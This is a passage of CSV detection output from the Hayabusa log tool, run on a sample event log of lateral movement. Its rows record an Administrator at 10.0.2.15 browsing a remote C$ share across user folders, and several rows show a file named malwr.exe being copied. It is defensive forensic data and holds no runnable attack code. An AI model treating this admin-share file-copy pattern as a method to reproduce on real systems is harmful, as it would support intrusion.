Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.619 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.619 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.619 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.619 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.619 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.629 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.629 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.629 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.629 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.629 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.629 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.639 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.639 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.639 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.639 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.639 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.639 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.649 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.649 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.649 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.649 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.649 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.659 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.659 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.659 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.659 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.659 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.659 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.659 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.669 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.669 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.669 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.669 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.669 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.679 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.679 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.679 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.679 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.679 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.679 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.689 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.689 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.689 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.689 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.689 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.689 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.699 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.699 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.699 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.709 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.709 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.709 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.709 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.709 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.709 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:26.981 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:26.981 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:27.061 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:27.071 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:27.081 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ui\SwDRM.dll | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:27.081 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:45.488 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:45.548 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:45.548 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:47.721 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:47.721 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | 